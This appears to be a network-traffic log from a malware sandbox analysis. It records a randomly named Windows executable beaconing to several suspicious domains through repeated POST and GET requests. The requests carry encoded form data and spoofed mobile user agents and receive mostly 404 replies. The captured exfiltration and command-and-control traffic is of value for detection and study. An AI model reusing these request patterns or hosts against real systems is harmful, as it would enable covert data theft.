                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8c9c896c7a1f4213-EWR
                                                                                                                                                                            Content-Encoding: gzip


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            10 | 192.168.2.5 | 63703 | 172.67.165.25 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Sep 27, 2024 17:30:47.977514029 CEST | 861 | OUT | POST /f66t/ HTTP/1.1
                                                                                                                                                                            Host: www.b5x7vk.agency
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.b5x7vk.agency
                                                                                                                                                                            Referer: http://www.b5x7vk.agency/f66t/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Sep 27, 2024 17:30:49.024214029 CEST | 684 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:48 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I6caT3V9PUjdDFr7KSnkRmMYcOmPRirgmFmZ7F5YR7XtMVz%2FdnZVdVzDY1KWArZkw4%2BAhZTOroSyr8AQVrC6QxM25lpRCBsxV1G5MHvGmlJ38dTxkmjl1P0npITEpWF9m2FLOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8c9c897c8905430d-EWR
                                                                                                                                                                            Content-Encoding: gzip


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            11 | 192.168.2.5 | 63704 | 172.67.165.25 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Sep 27, 2024 17:30:50.525249958 CEST | 1878 | OUT | POST /f66t/ HTTP/1.1
                                                                                                                                                                            Host: www.b5x7vk.agency
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.b5x7vk.agency
                                                                                                                                                                            Referer: http://www.b5x7vk.agency/f66t/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Sep 27, 2024 17:30:51.501018047 CEST | 688 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:51 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dWHQVjxtLPBV%2BAEKFjoR8OkKv1BdvDYU6xxAY8%2BsMqMTf649w1yvfFdYe5SOsdmh1Ak19jJDL9RrPEzFsh4Df6%2FAWLA86jqJNoqSo61JkeNqy8KWuwb7M8hA%2BPBWGiMBrNvasg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8c9c898c2947c436-EWR
                                                                                                                                                                            Content-Encoding: gzip


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            12 | 192.168.2.5 | 63705 | 172.67.165.25 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Sep 27, 2024 17:30:53.073514938 CEST | 585 | OUT | GET /f66t/?Ah=wMNxngytVvT+xiDvhZKVBLBZglmuZQUCx/WcIyOXqUp4vIwezETUsTI6SXRinkgbo4oPfyScfq3TTLYR3fLN41mF5bem5ZFkurSKCCFsELulDfuy7v5fTUVM4J27kpDPZg==&6RGD=r8eHwnMpb2dxK HTTP/1.1
                                                                                                                                                                            Host: www.b5x7vk.agency
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Sep 27, 2024 17:30:54.069080114 CEST | 742 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:54 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fGHQt%2Fn4mIQJsdIoR5kriFbshWEY0VR0Qg7LGnSkF0v4q2o0Kd7va7Ne6pdqHRvUYuc9x1Yu2jn2QMnI3I6pVl1XazmJ1Vw8zjCE%2BR5zqfSlSdzlnnm9W7q0YF9rCaq%2FEMt30g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8c9c899c294942ea-EWR
                                                                                                                                                                            Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            13 | 192.168.2.5 | 63706 | 208.91.197.27 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Sep 27, 2024 17:30:59.404990911 CEST | 856 | OUT | POST /7kkb/ HTTP/1.1
                                                                                                                                                                            Host: www.martaschrimpf.info
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.martaschrimpf.info
                                                                                                                                                                            Referer: http://www.martaschrimpf.info/7kkb/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            14 | 192.168.2.5 | 63707 | 208.91.197.27 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Sep 27, 2024 17:31:01.967781067 CEST | 876 | OUT | POST /7kkb/ HTTP/1.1
                                                                                                                                                                            Host: www.martaschrimpf.info
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.martaschrimpf.info
                                                                                                                                                                            Referer: http://www.martaschrimpf.info/7kkb/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            15 | 192.168.2.5 | 63708 | 208.91.197.27 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Sep 27, 2024 17:31:04.512590885 CEST | 1893 | OUT | POST /7kkb/ HTTP/1.1
                                                                                                                                                                            Host: www.martaschrimpf.info
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.martaschrimpf.info
                                                                                                                                                                            Referer: http://www.martaschrimpf.info/7kkb/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 63709 | 208.91.197.27 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:31:07.046612024 CEST | 590 | OUT | GET /7kkb/?6RGD=r8eHwnMpb2dxK&Ah=Vuf7L1aATO5bukV8eQdUIEmIaPgQ1yOpdgGCLe1WZLTuWrNT4xutTpWyFskV9eTAAXQRhMy7Zgc6S7zaREH9Qt7yJDZ+mejpqMKnoLgUtbmjvcVg7/Biou/HjIkaZAov/Q== HTTP/1.1
                                                                                                                                                                            Host: www.martaschrimpf.info
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
Sep 27, 2024 17:31:09.486481905 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:07 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                            Set-Cookie: vsid=912vr474996667662843165; expires=Wed, 26-Sep-2029 15:31:07 GMT; Max-Age=157680000; path=/; domain=www.martaschrimpf.info; HttpOnly
                                                                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_UTaKIVKsTSF0q4YKRaAzBOk7RXtRKUXOaL8J8dMvHimx9H6Z1tnNCUvz1TW4Eli32Nfb7N5Nkxd6NZsnOzcMmA==
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 63711 | 162.0.238.43 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:31:15.989598036 CEST | 832 | OUT | POST /3nd4/ HTTP/1.1
                                                                                                                                                                            Host: www.tomtox.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.tomtox.top
                                                                                                                                                                            Referer: http://www.tomtox.top/3nd4/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Ascii: Ah=9VUDgxRzAtYNQzUOnHGWy26x6TD0GiFci0uDKlmAUeLzSnAsJLZGCm2j22n4q9ZLykAjCZ2emY50p1PIenjI8GWcqnOqHvpquT+VLvwOpT1ZxCq9EkQeUbzS3w/4ymRujgSSu4OVuQQ3EiLI/oSPCvRc+veIdZJD9q3vA6ssBUK2trHNRjEqfi6qFa1N1H0oSUrSJcQ=
Sep 27, 2024 17:31:16.579109907 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:16 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 63712 | 162.0.238.43 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:31:18.539612055 CEST | 852 | OUT | POST /3nd4/ HTTP/1.1
                                                                                                                                                                            Host: www.tomtox.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.tomtox.top
                                                                                                                                                                            Referer: http://www.tomtox.top/3nd4/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Ascii: Ah=9VUDgxRzAtYNRTEOlhOW1W622zD0NCFQi0iDKkSQUs/zSGwsIKZGDm2j+Wn9ndZCykFcCYKemZZ0p0fIeUbL9WWeiHOoKPpquT+VLvkwpTtZxS69LlQZXbzRnQ/42mRijgS8u5T+uTo3EnvI/5SANvQX6vfmaKVL6ZqlHIFwRUCUl9qnLBMCMCWSVJ96k3VBI37iXLHUWs7PSXt9LYWPpY/M9dA4
Sep 27, 2024 17:31:19.253101110 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:19 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 63713 | 162.0.238.43 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:31:21.085164070 CEST | 1869 | OUT | POST /3nd4/ HTTP/1.1
                                                                                                                                                                            Host: www.tomtox.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.tomtox.top
                                                                                                                                                                            Referer: http://www.tomtox.top/3nd4/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
Sep 27, 2024 17:31:21.683240891 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:21 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 63714 | 162.0.238.43 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:31:23.627716064 CEST | 582 | OUT | GET /3nd4/?Ah=wX8jjEADFIUNbB1fuwn27lCA5Ee2RiJ4qVOVM3qHbtn5VxkeI5MaAkn7o3WZs+Yr7x4eULr6m9MYlnr0WXfs3GrmtSbeGOpl3yeERPUVozEPpEyzLyJ+XoeluijW2G1r0A==&6RGD=r8eHwnMpb2dxK HTTP/1.1
                                                                                                                                                                            Host: www.tomtox.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
Sep 27, 2024 17:31:24.343977928 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:24 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 63715 | 3.33.130.190 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:31:29.400132895 CEST | 832 | OUT | POST /e55r/ HTTP/1.1
                                                                                                                                                                            Host: www.tracy.club
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.tracy.club
                                                                                                                                                                            Referer: http://www.tracy.club/e55r/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Ascii: Ah=UxIKiLe2YTMMv9Z1Qn/r5FvWTylY7+2G2aoyT6t1D6SZ+f1lahbyok+Cl0AGQc1/j3bFExUYkauOxmsVnGfHTUtWbiumdDuUSFbutX92vebtza0XIMmONyt4WixggMQ6FULOvq4OSn3F1lfmUIcD5AB87+B60DjvdbO5VXR/uwrmP4pz/NTu/vOYsFV3Zn0HafOQCPs=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 63716 | 3.33.130.190 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:31:31.947791100 CEST | 852 | OUT | POST /e55r/ HTTP/1.1
                                                                                                                                                                            Host: www.tracy.club
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.tracy.club
                                                                                                                                                                            Referer: http://www.tracy.club/e55r/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Ascii: Ah=UxIKiLe2YTMMucp1cknr/lvRPilYye2a2aUyT7ooEJ6Z++llI1vyvk+CtUADUc1wj3HNEzwYkeOOxm8VnV3YSEtQSCukTjuUSFbutXoZvdrtzqkXZdnYHSt/RixgkMQ+FULovrUgSkDF1g7mUZcc3ABmkOAMyiOxRpGUR2IkzyTdDuEZlvbGsPig8WdAIXVuA8egcY5NeyMPmbAgDT+DZZlZhKox


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 63717 | 3.33.130.190 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:31:34.490447998 CEST | 1869 | OUT | POST /e55r/ HTTP/1.1
                                                                                                                                                                            Host: www.tracy.club
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.tracy.club
                                                                                                                                                                            Referer: http://www.tracy.club/e55r/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
